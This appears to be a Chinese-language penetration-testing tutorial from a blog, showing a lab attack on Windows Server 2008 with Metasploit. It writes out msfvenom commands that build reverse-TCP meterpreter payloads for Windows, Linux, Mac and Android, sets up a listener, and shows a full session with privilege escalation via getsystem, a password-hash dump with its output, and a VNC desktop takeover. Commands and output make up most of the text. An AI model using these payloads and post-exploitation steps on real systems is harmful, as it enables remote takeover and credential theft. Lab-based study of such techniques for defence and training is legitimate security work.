1 环境搭建
Windows server 2008 R2 Datacenter:192.168.5.128
kali linux:192.168.5.136
2 在kali上使用MSF Payload生成病毒
生成1.exe病毒文件。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.136 lport=3333 -f exe > 1.exe
┌──(root㉿kali)-[~] └─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.136 lport=3333 -f exe > 1.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 73802 bytes ┌──(root㉿kali)-[~] └─# ls 1.exe
各平台payload生成:
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -a x86 --platform Linux -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Android:
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 R > test.apk
3 拷贝病毒到被攻击主机windows server2008
从kalli机拷贝病毒文件1.exe到目标主机上。
4 kali进行监听
在kali机上进行监听,命令如下:jobs是查看当前所有工作。注意IP、端口等与生成病毒一致。
handler -H 192.168.5.136 -P 3333 -p windows/meterpreter/reverse_tcp
msf6 > handler -H 192.168.5.136 -P 3333 -p windows/meterpreter/reverse_tcp [*] Payload handler running as background job 0. [*] Started reverse TCP handler on 192.168.5.136:3333 msf6 > jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://192.168.5.136:3333 msf6 >
5 被攻击主机windows server2008模拟中招运行病毒
双击执行1.exe
6 kali获取目标主机权限
被攻击主机执行病毒后kali上显示已经拿下权限。
msf6 > [*] Sending stage (175686 bytes) to 192.168.5.128 [*] Meterpreter session 1 opened (192.168.5.136:3333 -> 192.168.5.128:49164) at 2022-12-23 02:40:42 -0500
在被攻击主机上命令行上执行netstat -ant查看,已经成功建立连接
使用sessions -l查看当前会话,使用sessions -i 1进入当前会话。执行shell命令进入命令行交互界面。使用ipconfig查看IP地址。
sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WIN-75NA0949GFB\Administrator @ WIN-75NA0949 192.168.5.136:3333 -> 192.168.5.128:49164 (1
GFB 92.168.5.128)
msf6 > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2288 created.
Channel 1 created.
Microsoft Windows [▒汾 6.1.7601]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒
C:\Users\Administrator\Desktop>ipconfig
ipconfig
Windows IP ▒▒▒▒
▒▒̫▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒:
▒▒▒▒ض▒▒▒ DNS ▒▒ . . . . . . . : localdomain
▒▒▒▒▒▒▒ IPv6 ▒▒ַ. . . . . . . . : fe80::4cee:7eba:c431:6e0c%11
IPv4 ▒▒ַ . . . . . . . . . . . . : 192.168.5.128
▒▒▒▒▒▒▒▒ . . . . . . . . . . . . : 255.255.255.0
Ĭ▒▒▒▒▒. . . . . . . . . . . . . : 192.168.5.2
▒▒▒▒▒▒▒▒▒ isatap.localdomain:
ý▒▒״̬ . . . . . . . . . . . . : ý▒▒▒ѶϿ▒
▒▒▒▒ض▒▒▒ DNS ▒▒ . . . . . . . : localdomain
C:\Users\Administrator\Desktop>
获取hash值
meterpreter > getuid Server username: WIN-75NA0949GFB\Administrator meterpreter > whoami [-] Unknown command: whoami meterpreter > getuid Server username: WIN-75NA0949GFB\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > run post/windwos/gather/hashdump [-] The specified meterpreter session script could not be found: post/windwos/gather/hashdump meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY b6af79f562638c8765e545393476a140... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... Administrator:"5▒S▒:S" [*] Dumping password hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:594664d649204bb5c644c47d721bebfc::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter >
run vnc获取桌面
meterpreter > run vnc [*] Creating a VNC reverse tcp stager: LHOST=192.168.5.136 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Users\ADMINI~1\AppData\Local\Temp\1\MNsCzZ.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.5.136:4545... meterpreter > [*] VNC Server session 2 opened (192.168.5.136:4545 -> 192.168.5.128:49165) at 2022-12-23 03:09:11 -0500 Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions No authentication needed Authentication successful Desktop name "win-75na0949gfb" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Same machine: preferring raw encoding
exit退出sessions。
后台挂起:background
meterpreter > background
[*] Backgrounding session 1...
msf6 > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN-75NA0949GFB 192.168.5.136:3333 -> 192.168.5.128:49164 (192.168.
5.128)
msf6 >
标签:exe,07,5.136,tcp,192.168,MSF,meterpreter,PAYLOAD,reverse From: https://www.cnblogs.com/snow2021/p/17000953.html